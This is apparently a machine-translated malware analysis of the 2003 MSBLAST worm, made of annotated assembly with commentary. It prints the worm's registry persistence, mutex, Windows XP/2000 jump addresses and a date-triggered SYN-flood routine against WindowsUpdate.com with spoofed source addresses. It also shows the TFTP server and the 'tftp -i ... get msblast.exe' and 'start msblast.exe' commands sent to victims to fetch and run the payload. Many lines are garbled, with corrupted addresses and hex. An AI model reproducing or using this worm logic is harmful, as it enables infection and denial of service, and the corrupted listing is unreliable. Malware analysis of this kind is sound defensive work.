Tombkeeper # Whitecell.org
; Write from the startup item in the registry
: 00401250 55 PUSH EBP
: 00401251 89E5 MOV EBP, ESP
: 00401253 81ECAC030000 SUB ESP, 000003AC
00401259 56 Push ESI
0040125A 57 Push EDI
: 0040125B 31F6 xor ESI, ESI
0040125D 6A00 Push 00000000
: 0040125F 8D45F8 LEA EAX, DWORD PTR [EBP-08]
00401262 50 Push EAX
00401263 6A00 Push 00000000
: 00401265 683F000F00 PUSH 000F003F
0040126 6A00 Push 00000000
0040126C 6A00 Push 00000000
0040126E 6A00 Push 00000000
: 00401270 685D484000 PUSH 0040485D; DB 'Software / Microsoft / Windows / CurrentVersion / Run', 0
00400008-008 00008 0000-00-00 000000-00-00
: 0040127A E80D110000 Call 0040238c; Advapi32.RegcreateKeyexa
0040127F 6A32 Push 00000032
: 00401281 683C404000 Push 0040403C; DB 'MSBLAST.EXE', 0
00401.100001 PUSH 00000001
00401288 6A00 Push 00000000
: 0040128A 6849484000 Push 00404849; DB 'Windows Auto Update', 0
: 0040128F FF75F8 PUSH [EBP-08]
: 00401292 E801110000 Call 00402398; Advapi32.RegSetValueexa
: 00401297 FF75F8 PUSH [EBP-08]
: 0040129A E8E1100000 Call 00402380; Advapi32.RegCloseKey
Creating a mutual
0040129F 6843484000 Push 00404843; DB 'Billy', 0
004012A4 6A01 PUSH 00000001
004012A6 6A00 Push 00000000
: 004012A8 E8A3100000 Call 00402350; Kernel32.createmutexa ......................
Select the random number of sending data
: 00401476 E8BD0E0000 Call 00402338; Kernel32.GettickCount
: 0040147B 50 Push Eax; Random number as SRAND with GetTickCount
: 0040147C E8B30F0000 Call 00402434; CRTDLL.SRAND
00401481 59 POP ECX
: 00401482 E8890F0000 Call 00402410; CRTDLL.RAND
: 00401487 B914000000 MOV ECX, 00000014
: 0040148C 99 CDQ
: 0040148D F7F9 IDIV ECX;
: 0040148F 83FA0C CMP EDX, 0000000C
: 00401492 7D02 JGE 00401496
: 00401494 31F6 xor ESI, ESI
00400001, T [00403134] 0000000001
: 004014A0 E86B0F0000 Call 00402410; CRTDLL.RAND
004014A5 B90A000000 MOV ECX, 0000000A
: 004014AA 99 CDQ
: 004014AB F7F9 IDIV ECX
: 004014AD 83FA07 CMP EDX, 00000007
: 004014B0 7E0A JLE 004014BC
: 004014B2 C7053431400002000000 MOV DWORD PTR [0000000002
........................
: 00401954 833D3431400001 CMP DWORD PTR [00403134] 00000001; By comparing this address to determine the attack code for the transmission to 2000 or XP
: 0040195B 750C JNE 00401969
: 0040195D C785ECEAFFFFFF9D130001 MOV DWORD PTR [EBP FFFFEAEC], 0100139D; Use a jump address for Windows XP
: 00401967 EB0A JMP 00401973
: 00401969 C785ECEAFFFFFF9F751800 MOV DWORD PTR [EBP FFFFEAEC], 0018759F; Using Jump Address for Windows 2000
........................
Date of judgment
: 004014FC 6A03 PUSH 00000003; Size of Buffer
: 004014FE 8D45F4 LEA EAX, DWORD PTR [EBP-0C]
: 00401501 50 Push Eax; Buffer: 00401502 683C484000 PUSH 0040483C; DB 'D', 0 Date
00401507 6A00 Push 00000000
00401509 6A00 Push 00000000
0040150 PUSH 00000409; "0409" = "EN-US; English (US)"
From the Locale parameters of GetDateFormata, the area setting of the operating system used is the United States.
: 00401510 E8E70D0000 Call 004022FC; kernel32.GetdateFormata
00401515 6A03 PUSH 00000003
: 00401517 8D45F0 LEA EAX, DWORD PTR [EBP-10]
0040151A 50 Push Eax
0040151B 683A484000 PUSH 0040483A; DB 'm', 0 per month
00401520 6A00 Push 00000000
00401522 6A00 Push 00000000
004046: 0000-00-00 PUSH 0000040000 Push 00000409
: 00401529 E8CE0D0000 Call 004022FC; kernel32.GetdateFormata
: 0040152E 8D45F4 Lea Eax, DWORD PTR [EBP-0C]
004015350 PUSH EAX
: 00401532 E8790E0000 Call 004023B0; CRTDLL.ATOI
00401537 59 POP ECX
: 00401538 83F80F CMP EAX, 0000000F; Is the comparison date greater than 15?
: 0040153B 7F0F JG 0040154C; Jump to the creation of DOS threads in the date greater than 15 days
: 0040153D 8D7DF0 LEA EDI, DWORD PTR [EBP-10]
: 00401540 57 Push EDI
: 00401541 E86A0E0000 Call 004023B0; CRTDLL.ATOI
: 00401546 59 POP ECX
: 00401547 83F808 CMP EAX, 00000008; Is the month greater than August?
: 0040154A 7E16 JLE 00401562; Month is greater than 8 months to create a DOS thread
: 0040154C 8D45FC LEA EAX, DWORD PTR [EBP-04]
: 0040154F 50 Push Eax: 00401550 6A00 PUSH 00000000
00401552 6A00 Push 00000000
: 00401554 68C11E4000 PUSH 00401EC1; DOS subunies
0040155 6A00 Push 00000000
0040155B 6A00 Push 00000000
: 0040155D E8120E0000 Call 00402374; Kernel32.createthread
........................
; Handle the address subunies, the conversion result is saved in EAX
004011E8B 55 Push EBP
: 00401E8C 89E5 MOV EBP, ESP
: 00401E8E 56 Push ESI
: 00401E8F 57 Push EDI
: 00401E90 FF7508 PUSH [EBP 08]
: 00401E93 E8D8020000 Call 00402170; WS2_32.Inet_addr
: 00401E98 89C7 MOV EDI, EAX
: 00401E9A 31F6 XOR ESI, ESI
: 00401E9C 83FFFF CMP EDI, FFFFFFF
: 00401E9F 751A JNE 00401EBB; if it is an IP address, jump directly, if not, parse the domain name
: 00401EA1 FF7508 PUSH [EBP 08]
: 00401EA4 E827030000 Call 004021d0; WS2_32.GethostByname
: 00401EA9 89C6 MOV ESI, EAX
: 00401EAB 09F6 or ESI, ESI
: 00401EAD 7505 JNE 00401EB4
: 00401EAF 83C8FF or Eax, fffffffff
: 00401EB2 EB09 JMP 00401EBD
: 00401EB4 8B460C MOV EAX, DWORD PTR [ESI 0C]
: 00401EB7 8B00 MOV EAX, DWORD PTR [EAX]
: 00401EB9 8B38 MOV EDI, DWORD PTR [EAX]
: 00401EBB 89F8 MOV EAX, EDI
00401EBD 5F POP EDI
: 00401EBE 5E POP ESI
00401EBF 5D POP EBP
00401 EC0 C3 RET
; DOS subunies
: 00401EC1 55 Push EBP: 00401EC2 89E5 MOV EBP, ESP
: 00401EC4 51 Push ECX
00401EC5 53 Push EBX
00401EC6 56 Push ESI
: 00401EC7 57 Push EDI
: 00401EC8 C745FC01000000 MOV [EBP-04] 00000001
: 00401ECF 68EC474000 Push 004047EC; DB 'WindowsUpdate.com', 0
: 00401ED4 E8B2FFFFFFFFFFFFFF CALL 00401E8B; processing address subunies
00401ED9 59 POP ECX
: 00401EDA 89C6 MOV ESI, ESI; ESI Save Analysis IP
00401EDC 6A01 Push 00000001
: 00401EDE 6A00 Push 00000000
00401EE0 6A00 PUSH 00000000
0040112 68FF000000 Push 000000FF
004017 6A03 PUSH 00000003
00401E9 6A02 PUSH 00000002
: 00401EEB E84C030000 Call 0040223C; WS2_32.WSASOCKETA
: 00401EF0 89C7 MOV EDI, EAX
: 00401EF2 83F8FF CMP EAX, FffffffFFF
: 00401EF5 7504 JNE 00401EFB
: 00401EF7 31C0 XOR EAX, EAX
: 00401EF9 EB34 JMP 00401F2F
00401104 PUSH 00000004
: 00401EFD 8D45FC Lea Eax, DWORD PTR [EBP-04]
: 00401F00 50 Push EAX
00401F01 6A02 PUSH 00000002
00401F03 6A00 PUSH 00000000
00401F05 57 PUSH EDI
: 00401F06 E8AD020000 Call 004021B8; WS2_32.SetSockOpt
: 00401F0B 83F8FF CMP Eax, ffffffffff
: 00401F0E 7504 JNE 00401F14; Success Jump
: 00401F10 31C0 XOR EAX, EAX
00401F12 EB1B JMP 00401F2F: 00401F14 57 PUSH EDI
00401F15 56 PUSH ESI
: 00401F16 E81B000000 Call 00401F36; Happiness function
: 00401F1B 83C408 Add ESP, 00000008
00401F1E 6A14 PUSH 00000014
: 00401F20 E837040000 Call 0040235C; kernel32.sleep
: 00401F25 Ebed JMP 00401F14
: 00401F27 57 Push EDI
: 00401F28 E8C7020000 Call 004021F4; WS2_32.CloseSocket
: 00401F2D 31C0 XOR EAX, EAX
: 00401F2F 5F POP EDI
: 00401F30 5E POP ESI
: 00401F31 5B POP EBX
: 00401F32 C9 Leave
: 00401F33 C20400 RET 0004
Happiness
: 00401F36 55 Push EBP
: 00401F37 89E5 MOV EBP, ESP
: 00401F39 81EC9C000000 SUB ESP, 0000009C
00401F3F 53 PUSH EBX
00401F40 56 PUSH ESI
: 00401F41 57 Push EDI
: 00401F42 8D7D9C LEA EDI, DWORD PTR [EBP-64]
: 00401F45 8D35B0474000 LEA ESI, DWORD PTR [004047B0]
: 00401F4B B90F000000 MOV ECX, 0000000F
: 00401F50 F3 REPZ
: 00401F51 A5 MOVSD
: 00401F52 66C7857Efffffff5000 MOV Word PTR [EBP FFFFFF7E], 0050
: 00401F5B E8D8030000 Call 00402338; Kernel32.GettickCount
: 00401F60 50 Push Eax; GettickCount results as a random number of SRAND
: 00401F61 E8CE040000 Call 00402434; CRTDLL.SRAND
: 00401F66 E8A5040000 Call 00402410; CRTDLL.RAND
: 00401F6B 898568FFFFFFFFFFFF68], EAX: 00401F71 E89A040000 CALL 00402410; CRTDLL.RAND
: 00401F76 B9FF000000 MOV ECX, 000000FF
: 00401F7B 99 CDQ
: 00401F7C F7F9 IDIV ECX
: 00401F7E 52 Push EDX; RAND
: 00401F7F 8BBD68FFFFFFFFFFFFFFFFFF68]]
: 00401F85 89F8 MOV EAX, EDI
: 00401F87 B9FF000000 MOV ECX, 000000FF
: 00401F8C 99 CDQ
: 00401F8D F7F9 IDIV ECX
: 00401F8F 52 Push EDX; RAND
: 00401F90 FF3538314000 Push DWORD PTR [00403138]; These two addresses save the first two bytes of this machine IP
: 00401F96 FF3514304000 Push DWORD PTR [00403014]
The source IP of Synflood is not completely random, the first two bytes are real, and the latter two bytes are random.
This may be to consider that some network devices do not allow non-network access to IP.
: 00401F9C 682B484000 PUSH 0040482B; DB '% i.% I.% I.% I', 0
: 00401FA1 8DBD6Effff Lea EDI, DWORD PTR [EBP FFFFFFFF1]
: 00401FA7 57 Push EDI; Generated IP
: 00401FA8 E87B040000 Call 00402428; Crtdll.Sprintf
: 00401FAD 8D856Efffff Lea Eax, DWORD PTR [EBP FFFFFF1]
: 00401FB3 50 Push EAX
: 00401FB4 E8D2FeffFFFFFFFFFFFFFF CALL 00401E8B; processing address subunies
: 00401FB9 89C3 MOV EBX, EAX; save the converted IP to EBX
; Below to construct synflood packets
: 00401FBB 66C745800200 MOV [EBP-80], 0002
: 00401FC1 0FB7857EfffffFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF7E]
: 00401FC8 50 Push EAX
Target port 80
: 00401FC9 E88A010000 Call 00402158; WS2_32.htons
: 00401FCE 89C7 MOV EDI, EAX
: 00401FD0 66897D82 MOV WORD PTR [EBP-7E], DI: 00401FD4 8B4508 MOV EAX, DWORD PTR [EBP 08]
: 00401FD7 894584 MOV DWORD PTR [EBP-7C], EAX
: 00401FDA C645EC45 MOV [EBP-14], 45
00401FDE 6A28 Push 00000028
: 00401FE0 E873010000 Call 00402158; WS2_32.htons
: 00401FE5 89C7 MOV EDI, EAX
: 00401FE7 66897DEE MOV WORD PTR [EBP-12], DI
: 00401FEB 66C745F00100 MOV [EBP-10], 0001; IDENT
: 00401FF1 66C745F20000 MOV [EBP-0E], 0000; FRAGN OFFSET: 0
: 00401FF7 C645F480 MOV [EBP-0C], 80; TTL: 128
: 00401FFB C645F506 MOV [EBP-0B], 06; Protocol: TCP
: 00401FFF 66C745F60000 MOV [EBP-0A], 0000
00402005 8B4508 MOV EAX, DWORD PTR [EBP 08]
00402008 8945FC MOV DWORD PTR [EBP-04], EAX
: 0040200B 0fb7857efffffffFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFET PTR [EBP FFFFFFFF7E]
00402012 50 Push EAX
: 00402013 E840010000 Call 00402158; WS2_32.htons
00402018 89C7 MOV EDI, EAX
0040201A 66897DDA MOV WORD PTR [EBP-26], DI
: 0040201E 8365E000 and DWORD PTR [EBP-20], 00000000
004022 C645E450 MOV [EBP-1C], 50
004026 C645E502 MOV [EBP-1B], 02
: 0040202A 6800400000 Push 00004000; TCP Window: 16384
: 0040202F E824010000 Call 00402158; WS2_32.htons
: 00402034 89C7 MOV EDI, EAX
: 00402036 66897DE6 MOV Word PTR [EBP-1A], DI; [EBP-1A] TCP WINDOW: 16384
: 0040203A 66C745EA0000 MOV [EBP-16], 0000
: 00402040 66C745E80000 MOV [EBP-18], 0000: 00402046 8B45FC MOV Eax, DWORD PTR [EBP-04]
: 004049 894594 MOV DWORD PTR [EBP-6C], EAX; [EBP-6C] Target IP
: 0040204C C6459800 MOV [EBP-68], 00
: 00405050 C6459906 MOV [EBP-67], 06
00402054 6A14 PUSH 00000014
004056 E8FD000000 Call 00402158; WS2_32.htons
: 0040205B 89C7 MOV EDI, EAX
: 0040205D 66897D9A MOV Word PTR [EBP-66], DI
: 00402061 895DF8 MOV DWORD PTR [EBP-08], EBX
: 00402064 E8A7030000 Call 00402410; Crtdll.rand
: 00402069 B9E8030000 MOV ECX, 000003E8
: 0040206E 99 CDQ
: 0040206F F7F9 IDIV ECX
: 00402071 89D7 MOV EDI, EDX
00402073 81C7E8030000 Add EDI, 000003E8
: 00402079 81E7FFFF0000 And EDI, 0000FFF
: 0040207F 57 Push EDI; Randomly generated source port
: 00408080 E8D3000000 Call 00402158; WS2_32.htons
: 004085 89C7 MOV EDI, EAX
: 00402087 66897DD8 MOV WORD PTR [EBP-28], DI
: 0040208B E880030000 Call 00402410; CRTDLL.RAND
: 00402090 898564ffffff Mov DWORD PTR [EBP fffffffff64], EAX
: 004096 E875030000 Call 00402410; Crtdll.rand; randomly generated SEQ Number
: 0040209B 8BBD64FFFFFFFFFFFEV EDI, DWORD PTR [EBP FFFFFF64]
004020A1 C1E710 SHL EDI, 10
: 004020A4 09C7 or EDI, EAX
: 004020A6 81E7FFF0000 and EDI, 0000FFF
: 004020AC 57 Push EDI
: 00402020AD E8A6000000 Call 00402158; WS2_32.htons: 004020B2 89C7 MOV EDI, EAX
: 004020B4 81E7FFFF0000 and EDI, 0000FFF
: 004020BA 897DDC MOV DWORD PTR [EBP-24], EDI
: 004020BD 895D90 MOV DWORD PTR [EBP-70], EBX
: 004020C0 6A0C Push 0000000C
: 004020C2 8D4590 LEA EAX, DWORD PTR [EBP-70]
: 004020C5 50 Push EAX
: 004020C6 8D459C LEA EAX, DWORD PTR [EBP-64]
: 004020C9 50 Push EAX
: 004020CA E81D030000 CALL 004023EC; CRTDLL.MEMCPY
004020CF 6A14 Push 00000014
: 004020D1 8D45D8 LEA EAX, DWORD PTR [EBP-28]
: 004020D4 50 Push EAX
: 004020D5 8D45A8 LEA EAX, DWORD PTR [EBP-58]
004020D8 50 Push EAX
: 004020D9 E80E030000 Call 004023EC; CRTDLL.MEMCPY
004020DE 6A20 Push 00000020
: 004020E0 8D459C LEA EAX, DWORD PTR [EBP-64]
: 004020E3 50 Push EAX
: 004020E4 E857FDfffff Call 00401E40
: 004020E9 89C7 MOV EDI, EAX
: 004020EB 66897DE8 MOV WORD PTR [EBP-18], DI
: 004020EF 6A14 Push 00000014
: 004020F1 8D45EC Lea EAX, DWORD PTR [EBP-14]
: 004020F4 50 Push EAX
: 004020F5 8D459C LEA EAX, DWORD PTR [EBP-64]
: 004020F8 50 Push EAX
: 004020F9 E8EE020000 Call 004023EC; CRTDLL.MEMCPY
: 004020fe 6A14 Push 00000014
: 00402100 8D45D8 LEA EAX, DWORD PTR [EBP-28]
: 00402103 50 PUSH EAX: 00402104 8D45B0 LEA EAX, DWORD PTR [EBP-50]; [EBP-50] Source Port
00402107 50 Push EAX
: 00402108 E8DF020000 Call 004023EC; CRTDLL.MEMCPY
0040210D 6A04 Push 00000004
0040210F 6A00 Push 00000000
: 004021118 8D45C4 LEA EAX, DWORD PTR [EBP-3C]
00402114 50 Push EAX
: 00402115 E8DE020000 Call 004023F8; CRTDLL.MEMSET
00402111 6A28 PUSH 00000028
: 0040211C 8D459C LEA EAX, DWORD PTR [EBP-64]
0040211F 50 Push EAX
: 00402120 E81BFDFFFFFFFFFFF CALL 00401E40
: 00402125 89C7 MOV EDI, EAX
: 00402127 66897DF6 MOV WORD PTR [EBP-0A], DI
0040212B 6A14 PUSH 00000014
: 0040212D 8D45EC Lea Eax, DWORD PTR [EBP-14]
00402130 50 Push EAX
: 00402131 8D459C Lea Eax, DWORD PTR [EBP-64]
00402134 50 PUSH EAX
: 00402135 E8B2020000 Call 004023EC; CRTDLL.MEMCPY
: 0040213A 83C478 Add ESP, 00000078
0040213D 6A10 PUSH 00000010
: 0040213F 8D4580 Lea Eax, DWORD PTR [EBP-80]
00402142 50 PUSH EAX
00402143 6A00 PUSH 00000000
00402145 6A28 PUSH 00000028
: 00402147 8D459C LEA EAX, DWORD PTR [EBP-64]
: 0040214A 50 Push EAX
: 0040214B FF750C PUSH [EBP 0C]
: 0040214E E859000000 Call 004021ac; WS2_32.Sendto bag
00402153 5F POP EDI
: 00402154 5E POP ESI: 00402155 5B POP EBX
00402156 C9 Leave
00402157 C3 RET
..................
Create a TFTP server function
00401576 55 PUSH EBP
: 00401577 89E5 MOV EBP, ESP
: 00401579 81EC2C040000 SUB ESP, 0000042C
0040157F 53 PUSH EBX
00401580 56 PUSH ESI
: 00401581 57 Push EDI
00404018], 00000001
0040158C 6A00 Push 00000000
0040158E 6A02 Push 00000002; SOCK_DGRAM Using UDP
00401590 6A02 PUSH 00000002
: 00401592 E82D0C0000 Call 004021C4; WS2_32.Socket
: 00401597 A324314000 MOV DWORD PTR [00403124], EAX
: 0040159C 83F8FF CMP EAX, FfffffffF
: 0040159F 0F8445010000 JE 004016EA
004015A5 6A10 Push 00000010
004015A7 6A00 Push 00000000
: 004015A9 8D85D8FDFFFF LEA EAX, DWORD PTR [EBP FFFFFDD8]
004015AF 50 Push Eax
: 004015B0 E8430E0000 Call 004023F8; CRTDLL.MEMSET
: 004015B5 83C40C Add ESP, 0000000C
: 004015B8 66C785D8FDFFFFF0200 MOV Word PTR [EBP FFFFFDD8], 0002
: 004015C1 6A45 PUSH 00000045; Monitoring 69 port
: 004015C3 E8900B0000 CALL 00402158; WS2_32.htons
: 004015C8 89C2 MOV EDX, EAX
: 004015CA 668995Dafdffff Mov Word PTR [EBP FFFFFDDA], DX
: 004015D1 83A5DCFDFFFFF00 AND DWORD PTR [EBP FFFFFDDC], 00000000
004015D8 6A10 Push 00000010
: 004015DA 8D85D8FDFFFF LEA EAX, DWORD PTR [EBP fffddd8]: 004015E0 50 PUSH EAX
: 004015E1 FF3524314000 Push DWORD PTR [00403124]
: 004015E7 E8F00B0000 Call 004021DC; WS2_32.Bind
: 004015EC 09C0 or Eax, EAX
004015EE 0F85F6000000 JNE 004016EA
: 004015F4 C785F8FDFFF10000000 MOV DWORD PTR [EBP FFFFDF8], 00000010
: 004015FE 8D85F8FDffff Lea Eax, DWORD PTR [EBP FFFFFDF8]
00401604 50 Push EAX
: 00401605 8D85E8FDffff Lea Eax, DWORD PTR [EBP FFFFFDE8]
0040160B 50 Push EAX
0040160 C 6A00 Push 00000000
00402002 PUSH 0000204
: 00401613 8D85D4FBFFFFFFFFE EAX, DWORD PTR [EBP FFFFFBD4]
: 00401619 50 Push EAX
: 0040161A FF3524314000 Push DWORD PTR [00403124]
: 00401620 E8630B0000 Call 00402188; WS2_32.Recvfrom
: 00401625 83F801 CMP Eax, 00000001; If request
: 00401628 0F8CBC000000 JL 004016EA
: 0040162E 31DB XOR EBX, EBX
: 00401630 6837484000 Push 00404837; DB 'RB', 0 read-only, bin mode open file
: 00401635 6820304000 Push 00403020; Offset of the current file absolute path
: 0040163A E8950D0000 Call 004023D4; CRTDLL.FOPEN
This worm is established in the TFTP and the same NIMDA is the same, regardless of the requested file name, return worm files.
This TFTP server does not cause system file disclosure. Different from Nimda, this TFTP server will only run after successfully attacking a machine.
So did not see the monitor UDP / 69 port on the system infected with MSBLAST.EXE.
..................
Create a TFTP server thread, send the TFTP command to transfer files and run
: 00401CBD 8D85CCE6FFFF LEA EAX, DWORD PTR [EBP FFFFE6CC]
: 00401CC3 50 Push EAX
00401CC4 6A00 Push @000000: 00401CC6 6A00 PUSH 00000000
: 00401CC8 6876154000 Push 00401576; Create a TFTP server function
00401CCD 6A00 Push 00000000
: 00401CCF 6A00 Push 00000000
: 00401CD1 E89E060000 Call 00402374; kernel32.createthread
: 00401CD6 8985C0EDFFFF MOV DWORD PTR [EBP FFFFEDC0], EAX
: 00401CDC 6A50 Push 00000050
: 00401CDE E879060000 Call 0040235C; kernel32.sleep
00401CE3 683C404000 PUSH 0040403C; DB 'MSBLAST.EXE', 0
: 00401CE8 6800304000 Push 00403000; Native IP
: 00401CED 680C484000 PUSH 0040480C; DB 'TFTP -I% s get% s', 0
: 00401CF2 8D85FCedffff Lea Eax, DWORD PTR [EBP FFFFFEDFC]
: 00401CF8 50 Push EAX
: 00401CF9 E82A070000 Call 00402428; CRTDLL.SPRINTF
: 00401CFE 83C410 Add ESP, 00000010
: 00401D01 8D8DFFFFFFFFFFLE ECX, DWORD PTR [EBP FFFFEDFC]
: 00401D07 83C8FF or Eax, ffffffff
: 00401D0A 40 Inc EAX
: 00401D0B 803C0100 CMP BYTE PTR [ECX EAX], 00
: 00401D0F 75F9 JNE 00401D0A
: 00401D11 6A00 Push 00000000
: 00401D13 50 Push EAX
: 00401D14 8D85FCedffff Lea Eax, DWORD PTR [EBP FFFFEDFC]
00401D1A 50 Push EAX
: 00401D1B FFB5F8EDFFFF PUSH DWORD PTR [EBP FFFFEDF8]
: 00401D21 E87A040000 Call 004021A0; WS2_32.send
: 00401D26 83F801 CMP EAX, 00000001
: 00401D29 0F8CBC000000 JL 00401DEB
: 00401D2F 68E8030000 Push 000003E8: 00401D34 E823060000 Call 0040235C; kernel32.sleep
: 00401D39 31DB XOR EBX, EBX
: 00401D3B EB0B JMP 00401D48
: 00401D3D 68D0070000 Push 000007D0
: 00401D42 E815060000 Call 0040235C; kernel32.sleep
: 00401D47 43 INC EBX
: 00401D48 83FB0A CMP EBX, 0000000A
: 00401D4B 7D09 JGE 00401D56
: 00401D4D 833D3840400000 CMP DWORD PTR [00000000
: 00401D54 75E7 JNE 00401D3D
: 00401D56 683C404000 PUSH 0040403C; DB 'MSBLAST.EXE', 0
: 00401D5B 6802484000 Push 00404802; DB 'start% s', 0
: 00401D60 8D85FCedffff Lea Eax, DWORD PTR [EBP FFFFFEDFC]
: 00401D66 50 Push EAX
: 00401D67 E8BC060000 Call 00402428; CRTDLL.SPRINTF
: 00401D6C 83C40C Add ESP, 0000000C
: 00401D6F 8D8DFCEDFFFF LEA ECX, DWORD PTR [EBP FFFFFEDFC]
: 00401D75 83C8FF or Eax, fffffff
: 00401D78 40 Inc EAX
: 00401D79 803C0100 CMP BYTE PTR [ECX EAX], 00
: 00401D7D 75F9 JNE 00401D78
: 00401D7F 6A00 Push 00000000
00401D81 50 Push EAX
: 00401D82 8D85FCedffff Lea Eax, DWORD PTR [EBP FFFFEDFC]
: 00401D88 50 Push EAX
: 00401D89 FFB5F8EDFFFFFFF PUSH DWORD PTR [EBP FFFFEDF8]
: 00401D8F E80C040000 Call 004021A0; WS2_32.Send
: 00401D94 83F801 CMP EAX, 00000001
: 00401D97 7C52 JL 00401DEB
: 00401D99 68D0070000 Push 000007D0: 00401D9E E8B9050000 Call 0040235C; kernel32.sleep
: 00401DA3 683C404000 PUSH 0040403C; DB 'MSBLAST.EXE', 0
: 00401DA8 68FE474000 PUSH 004047FE; DB '% s', 0
: 00401DAD 8D85FCedffff Lea Eax, DWORD PTR [EBP FFFFFEDFC]
00401DB3 50 Push EAX
: 00401DB4 E86F060000 Call 00402428; CRTDLL.SPRINTF
: 00401DB9 83C40C Add ESP, 0000000C
: 00401DBC 8D8DFCEDFFFFLE ECX, DWORD PTR [EBP FFFFEDFC]
: 00401DC2 83C8FF or Eax, ffffffffffF
: 00401DC5 40 Inc EAX
: 00401DC6 803C0100 CMP BYTE PTR [ECX EAX], 00
: 00401DCA 75F9 JNE 00401DC5
: 00401DCC 6A00 Push 00000000
: 00401DCE 50 Push EAX
: 00401DCF 8D85FCedffff Lea Eax, DWORD PTR [EBP FFFFEDFC]
: 00401DD5 50 Push EAX
: 00401DD6 FFB5F8EDFFFF PUSH DWORD PTR [EBP FFFFEDF8]
: 00401DDC E8BF030000 Call 004021A0; WS2_32.SEND
00401DE1 68D0070000 Push 000007D0
: 00401DE6 E871050000 Call 0040235C; kernel32.sleep
: 00401Deb 83bdf8edffff00 CMP DWORD PTR [EBP FFFFEDF8], 00000000
: 00401DF2 740B JE 00401DFF
: 00401DF4 FFB5F8EDFFF PUSH DWORD PTR [EBP FFFFEDF8]
: 00401DFA E8F5030000 Call 004021F4; WS2_32.CloseSocket
: 00401DFF 833D3840400000 CMP DWORD PTR [00404038] 00000000
004017 741F JE 00401E27
004011: 000000000000002
: 00401E0A FFB5C0EDFFFF PUSH DWORD PTR [EBP fffedc0]: 0040110 E853050000 Call 00402368; kernel32.TerminateThread
: 00401E15 FF3524314000 Push DWORD PTR [00403124]
: 00401E1B E8D4030000 Call 004021F4; WS2_32.CloseSocket
0040400000, China: 00404038] 00000000
004017 83BDC0EDFFFF00 CMP DWORD PTR [EBP fffedc0], 00000000
: 00401E2E 740B JE 00401E3B
: 00401E30 FFB5C0EDFFFFFFFFFFFFFFFFFFFFFFFPED DWORD PTR [EBP FFFFEDC0]
: 00401E36 E8F1040000 Call 0040232C; kernel32.closehandle
: 00401E3B 5F POP EDI
: 00401E3C 5E POP ESI
: 00401E3D 5B POP EBX
: 00401E3E C9 Leave
: 00401E3F C3 RET
; Send the command after connecting to the far end:
; TFTP -I XXX.XXX.XXX.XXX GET MSBLAST.EXE
Start msblast.exe
Msblast.exe
I don't know why I want to run twicens MSBLAST.EXE.
The file downloaded by the TFTP download is read-only.
From the LCID parameter from the getDateFormat function, it is 409, and the area setting of the operating system used is the United States.
From the file compilation time to see 7:21 on August 11, 2003. The earliest time captured on Honeypot is Beijing time to 14:03 on August 11, 2003.
If the author is in the same time zone in the same time, it is 6 hours after spreading to Honeypot. If not, then the author is where the place should not exceed 6 moments from our west.
